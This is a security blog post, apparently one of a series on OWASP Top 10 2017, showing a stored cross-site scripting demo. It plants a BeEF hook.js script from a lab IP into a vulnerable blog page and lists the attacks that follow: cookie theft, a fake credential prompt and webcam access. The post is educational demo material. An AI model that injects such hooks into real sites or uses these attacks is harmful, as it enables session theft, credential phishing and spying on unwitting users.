A7 2017 – XSS (part 2)

Every public speech I make, every lecture I present, I always start with a demo. I know there are highly trained professionals out there with outstanding public speaking and presentation skills who write articles and books about art of public speaking. But I guess for most of us it’s more about finding our own way of speaking to audience.

I start with a demo because I think it makes people more involved. And demos of setting some system up or pentesting with visual results are always entertaining and eye-catching for everybody in the room.

So, when it comes to a demo of XSS there’s no better example than use BeEF.

a7-11

No, not that one. BeEF as Browser Exploitation Framework

So, BeEF is a tool or a framework that makes it easy to demonstrate an XSS attack on a vulnerable web page. As we know XSS occurs when we can run a malicious script on a web page. So, BeEF contains this pre-configured script and a front-end to interact with data this script collects. As soon as script is executed BeEF will hook the browser and use it as a backhead to launch one of its modules.

Let’s go back to our example from «A7 – Cross Site Scripting (XSS)» > «Persistent (Second Order)» > «Add to your blog». But this time we put the BeEF script to the blog. It looks like this:

http://192.168.19.128:3000/hook.js

Ip address here is a BeEF frontend IP. Now let’s switch to a BeEF UI:

a7-12

Here we can see all the browsers that are there on the page, and here’s our browser:

a7-13

We can get all the basic details about victim’s browser on Details tab:

a7-16

But what’s interesting here is a Commands tab. Here are all the exploits that are available with the BeEF. All the exploits are marked with one color:

a7-15

So obviously some exploits will work for a specific browser and some won’t. This is where the fun begins as we can start running commands to demonstrate the severity of XSS. For example, we can easily steal all the cookies from browser:

a7-16

and generate a fake authentication form to trick a victim into typing his credentials:

a7-17

Or even turn on a web camera and see what is going on behind the keyboard on the other side:
a7-18

He-he, mine is taped for years now, how’s yours? =)

So, how does it look? XSS is … well “… a pathway to many abilities some consider to be unnatural”. You know who said that, right?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s